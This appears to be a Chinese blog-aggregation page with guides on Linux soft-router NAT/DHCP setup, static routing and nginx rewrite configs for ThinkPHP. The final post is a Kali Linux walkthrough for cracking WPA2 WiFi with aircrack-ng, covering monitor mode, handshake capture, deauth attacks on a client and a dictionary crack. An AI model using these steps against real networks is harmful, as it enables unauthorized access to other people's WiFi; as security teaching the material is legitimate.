2011-11-27 16:46:58 zhaoweitco 阅读数 4394

软路由是指利用台式机或服务器配合软件形成路由解决方案,主要靠软件的设置,达成路由器的功能;而硬路由则是以特用的硬设备,包括处理器、电源供应、嵌入式软件,提供设定的路由器功能

搭建步骤:
1。安装linux系统
2。配置NAT
3。配置DHCP

一、安装linux系统
1.机器的主板集成网卡以坏,所以安装两块  TP-LINK TF-3239DL 以作网关来做网络负载均衡,建议多块网卡。
        系统选用的 RedHat 9  来安装,配置网卡地址:
       
2.网卡信息
        网卡1  外网端,现实技术验证,直接从路由器分进来的网线。(真实情况中,网卡1直接配置ADSL) 
eth0  网卡1:
                 IP:             192.168.1.200
 子网掩码: 255.255.255.0
网关: 192.168.1.1

        网卡2  当做局域网网关
        eth1 网卡2:
IP:   192.168.2.1     (该地址是局域网网关)
子网掩码: 255.255.255.0
网关: 不设置

配置  dns 

3. 安装时记得选择  安装 ssh 服务 

二、配置NAT1.修改 /etc/sysctl.conf# vi /etc/sysctl.conf
编辑修改 net.ipv4.ip_forward = 1 (开启转发) 
 

2.剩余命令
# iptables -F
# iptables -P  INPUT  ACCEPT
# iptables -P  FORWARD   ACCEPT
# iptables -t  nat  -A   POSTROUTING  -o eth0  -j  MASQUERADE 

      最后一句开启连接外网的网卡 的NAT

     用笔记本连接网卡2 接口  ,  配置客户机
    IP: 192.168.2.101
            子网掩码: 255.255.255.0
    配置DNS

    ping  www.baidu.com  ping通 , 访问OK,配置NAT成功!

三、配置DHCP
1.首先确认服务器是否安装DHCP服务
# rpm -qa |  grep dhcp

2.如未安装进行挂载光盘并安装DHCP服务
使用 mount 命令进行光盘挂载
# mount /mnt/cdrom
然后进入目录使用rpm进行安装
#  cd /mnt/cdrom/RedHat/RPMS/
#  rpm -ivh dhcp-3.0pl1-23.i386.rpm 

3.配置DHCP
拷贝示例配置文件到 /etc/dhcpd.conf
#  cd /etc
# cp /usr/share/doc/dhcp-3.0pl1/dhcpd.conf.sample  dhcpd.conf    

修改示例文件
#   vi  dhcpd.conf 

我的修改完成后文件
ddns-update-style interim;
ignore client-updates;


subnet 192.168.2.0 netmask 255.255.255.0 {


# --- default gateway
        option routers                  192.168.2.1;            #默认网关
        option subnet-mask              255.255.255.0;          #默认子网掩码


        option nis-domain               "domain.org";
        option domain-name              "domain.org";
        option domain-name-servers      58.20.127.170;# 默认 DNS


        option time-offset              8000;   # Eastern Standard Time    #时区
#       option ntp-servers              192.168.1.1;
#       option netbios-name-servers     192.168.1.1;
# --- Selects point-to-point node (default is hybrid). Don't change this unless
# -- you understand Netbios very well
#       option netbios-node-type 2;


        range dynamic-bootp 192.168.2.100 192.168.2.254;         # DHCP 子网IP范围
        default-lease-time 21600;                                
        max-lease-time 43200;                                 


        # we want the nameserver to appear at a fixed address
        host ns {      #指定客户端IP   供无盘使用
                next-server marvin.redhat.com;
                hardware ethernet 12:34:56:78:AB:CD;
                fixed-address 192.168.2.28;
        }
}


四、启动DHCP服务
       # service dhcpd start


       客户机连接,选择自动获取IP  测试。该配置完成!

2018-08-04 21:45:07 LemonsDemoZ 阅读数 750

Linux中TP3.2.3部署问题


1. 域名设置

/etc/hosts中 增加 ip和域名

2. nginx支持tp(支持普通形式路由)

 server {
       listen       端口;
       server_name  域名;
 location / {
             root   路径;
             index  index.html index.htm index.php;
             location / {
            if (!-e $request_filename) {
            rewrite  ^(.*)$  /index.php?s=$1  last;
            break;
    }
 }
         }
        location ~ \.php$ {
              root           路径;
              fastcgi_pass   127.0.0.1:9000;
        //这里不关事(标注)
              fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_na    me;
              include        fastcgi_params;
          }
 }

3. nginx支持pathinfo路由

在以上标注地方增加代码:
fastcgi_split_path_info ^(.+\.php)(.*)$; 
fastcgi_param PATH_INFO $fastcgi_path_info; 

ps:修改配置文件可不重启,直接nginx -s reload重新读取即可.

加深理解> http://www.thinkphp.cn/topic/40391.html

2009-01-07 22:57:00 zhulinfeiba 阅读数 4164

PC上有两个物理网卡。虚拟机中的eth0对应的物理网卡接TP-Link路由器(192.168.1.1),eth1对应的物理网卡接一台本本(192.168.2.124)。

(1)给这个eth0分配地址:
# ifconfig eth0 192.168.1.125 netmask 255.255.255.0
(2)增加一条静态路由:
# route add -net 192.168.1.0 netmask 255.255.255.255.0 dev eth0

(3)给eth1分配地址:
# route add -net 192.168.2.1 netmask 255.255.255.0 
(4)再增加一条静态路由:
# route add -net 192.168.2.0 netmask 255.255.255.0 dev eth1  
(5)为系统增加一条缺省路由:

# route add default gw 192.168.1.1(TP-Link的地址)

(6)要增加系统的IP转发功能:

#echo 1 > /proc/sys/net/ipv4/ip_forward

到此,该虚拟机linux基本具备的路由器功能。但问题来了,本本可以ping通网关即(该虚拟机linux的eth1),却ping不通TP-Link路由器。后来是发现问题出在我的TP-Link路由器:没有数据包回程的静态路由,ping出去的包有去无回。

解决办法:配置该TP-Link路由器,设置一条静态路由(destination:192.168.2.0      gw:192.168.1.125)。

到此,本本可以通过该虚拟机linux访问路由器(还需将TP-Link的LAN口进行设置,将子网掩码设为255.255.0.0,否则本本只能ping通路由器,而没有权限登录路由器)。

 

但是,本本是不能访问外网的,因为它所属网段是192.168.2.0,而TP-Link的NAT规则只是针对192.168.1.0网段。所以接下来准备重新进行虚拟机linux的配置,使其具有NAT功能。

2018-09-27 17:04:38 weixin_41000837 阅读数 3914

前段时间给客户写了个TP5框架的后台,主要是API调用,上传到客户服务器后发现首页可用,但所有内页报404错误,网上一搜发现天多一样的问题,但找了很多都是不可用的,而且都是过时的,但最终还是自己试出来了,今天贴下,亲测可用。

 

宝塔面板windows-5.4.0+Nginx-1.12配置(Linux请使用宝塔面板,可以直接打开配置文件,然后根据这个修改,一样的)

请完全按此顺序执行,不然我也不清楚有没有其他问题

1、通过宝塔线安装好Nginx与其它环境

2、通过宝塔面板 添加 网站 (这一步很重要,宝塔会自动配置一些文件,可以省去很多事情)

3、打开宝塔目录应该是(我的宝塔是装个在D盘,路径如下D:\BtSoft\WebSoft\nginx\conf\vhost) 注意红色部分,是conf\vhost目录下

4、打开找到对应的域名.conf文件,比如:你的网站域名是www.xxx.com,那么vhost目录下就会有一个www.xxx.com.conf文件,用记事本以外的软件打开编辑,你会看到如下的代码(软件自动生成的)

#START-SITE
server {
	listen 80;
	server_name  www.jsq.com;
	access_log  logs/www.jsq.com.access.log;
	root   D:/wwwroot/www.jsq.com; #网站绝对路径
	index  index.php default.php index.html index.htm default.html default.htm;
	
	include rewrite/www.jsq.com.conf;
		
	#START-ERROR-PAGE
	error_page 403 /403.html;
	error_page 404 /404.html;
    error_page 502 /502.html;
	#END-ERROR-PAGE
	
	#301-START
	#301-END	
	
	#REFERER-START
	#REFERER-END
	
	#PROXY-START
	#PROXY-END
	
	#START-SSL
	#END-SSL
	
	#START-PHP
	location ~ \.php$ {
		root   D:/wwwroot/www.jsq.com;
		fastcgi_pass   127.0.0.1:4554;#后面4554 为默认端口请勿修改
		fastcgi_index  index.php;
		fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
		include        fastcgi_params;
    }
	#END-PHP
}
#END-SITE

5、修改配置文件如下,红色部分是修改后的,切勿直接复制 代码增加不了颜色,看中文注释

#START-SITE
server {
	listen 80;
	server_name  www.jqqq.com;
	access_log  logs/www.jqqq.com.access.log;
	root   E:/wwwroot/www.jqtest.com/public;
	index  index.php default.php index.html index.htm default.html default.htm;
	
	#include rewrite/www.jqqq.com.conf; #注释该行,无需引用
	location / { #第一部分 起始
	    try_files $uri $uri/ /index.php$uri;
           #下面这两个if是为了能获取$_GET参数,不加则无法获取
	    if ( -f $request_filename) {  
            break;  
        }  
        if ( !-e $request_filename) {  
            rewrite ^(.*)$ /index.php/$1 last;  
            break;  
        }  
	}	#第一部分 结束

	#START-ERROR-PAGE
	error_page 403 /403.html;
	error_page 404 /404.html;
    error_page 502 /502.html;
	#END-ERROR-PAGE
	
	#301-START
	#301-END
	
	
	#REFERER-START
	#REFERER-END
	
	#PROXY-START
	#PROXY-END
	
	#START-SSL
	#END-SSL
	location ~ /\.ht { #第二部分 起始
		deny all;
	} #第二部 结束
	
	#START-PHP
	location ~* \.php(.*)$ {
		root   E:/wwwroot/www.jqtest.com/public;
		fastcgi_pass   127.0.0.1:4554;
		fastcgi_index  index.php;
		fastcgi_split_path_info ^((?U).+\.php)(/?.+)$;  #第三部分  起始
		fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; 
     	fastcgi_param PATH_INFO $fastcgi_path_info;  #第三部分 结束
		fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
		include        fastcgi_params;
    }
	#END-PHP
}
#END-SITE

 

 

6、重启Nginx 然后看看网站是否已经可以使用路由了,并且$_GET参数也可以正常使用。

 

 

注意:如果你的配置文件,跟我的不一样,那可能是版本问题,但大体相同,可以自行修改。

 

2020-03-29 17:56:10 leoleoleol 阅读数 62

Kali Linux暴力破解WiFi
一. 前期准备

  1. 硬件
    外置网卡(型号EDUP EP-N8508GS)
    笔记本
    路由器(TP-Link)
  2. 软件
    虚拟机(VM Ware 15pro)
    操作系统(Kali Linux)
  3. 虚拟机网络适配器设置为桥接模式
  4. 外置网卡连接Kali Linux
    二. 激活无线网卡至monitor(监听)模式
  5. 配置无线网络接口
iwconfig

在这里插入图片描述
2. 关闭network manager网络服务

service network-manager stop
  1. check将所有影响到aircrack-ng工作的进程罗列出来,强烈推荐使用aircrack-ng套装的时候停掉这些进程。check kill会罗列并杀死影响aircrack-ng的进程
airmon-ng check kill

在这里插入图片描述
4. 开启monitor模式

airmon-ng start wlan0

在这里插入图片描述
MAC80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon
表示在监听模式下无线网卡名称变为wlan0mon
5. iwconfig确认是否进入monitor模式

iwconfig

在这里插入图片描述

三. 探测阶段

sudo airodump-ng wlan0mon

在这里插入图片描述
探测周围WiFi的各种信息

可以看到,最右侧的ESSID,下面的是周围WiFi的名字,BSSID是WiFi对应的mac地址。ENC是加密方式,可以看到基本都是WPA2的,很少有WPA和WEP,因为这两个的安全性都较WPA2次之。CH是信道。
在这里选择对加密类型为WPA2的TP-LINK_85EF进行抓包,可看到BSSID即mac地址为F4:83:CD:57:85:EF,CH即信道为1。
四. 抓包阶段

airodump-ng -c 1 --bssid F4:83:CD:57:85:EF -w leo wlan0mon

在这里插入图片描述

使用airodump-ng这个工具进行抓包:
-c 1是频道1
–bssid 是WiFi热点对应的mac地址
-w leo是保存到文件leo中
wlan0mon是监听模式无线网卡名称
五. 攻击阶段

  1. 解压Kali Linux中默认存在的字典
cd /usr/share/wordlists
gunzip rockyou.txt.gz
cd /root

在这里插入图片描述

这里顺便记录一下Kali中几个常用的字典文件的位置:

/usr/share/john/password.lst
/usr/share/wfuzz/wordlist
/usr/share/ wordlists
  1. 攻击
aireplay-ng -0 2 -a F4:83:CD:57:85:EF -c 80:ED:2C:79:C4:9D wlan0mon

在这里插入图片描述
-0 采用deauth攻击模式,后面跟上攻击次数,这里我设置为2
-a 后跟路由器(WiFi热点)的mac地址
-c 后跟客户端的mac地址
这里为了获得破解所需的WPA2握手验证的整个完整数据包,我们将会发送一种称之为“Deauth”的数据包来将已经连接至无线路由器的合法无线客户端强制断开,此时,客户端就会自动重新连接无线路由器,我们也就有机会捕获到包含WPA2握手验证的完整数据包了。
3. 重复抓包
在这里插入图片描述
可以看到右上角多了一个WPA handshake,如果没有,就再攻击一次,我这个就是攻击了两次才出现的。出现之后攻击阶段与抓包阶段就结束了。
六. 破解阶段

ls
aircrack-ng -w /usr/share/wordlists/rockyou.txt leo-04.cap

在这里插入图片描述
首先ls查看当前目录产生的握手包名称(leo-04.cap)
-w 代表字典
KEY FOUND! 代表WiFi密码已破解成功,后跟破解得到的密码。

没有更多推荐了,返回首页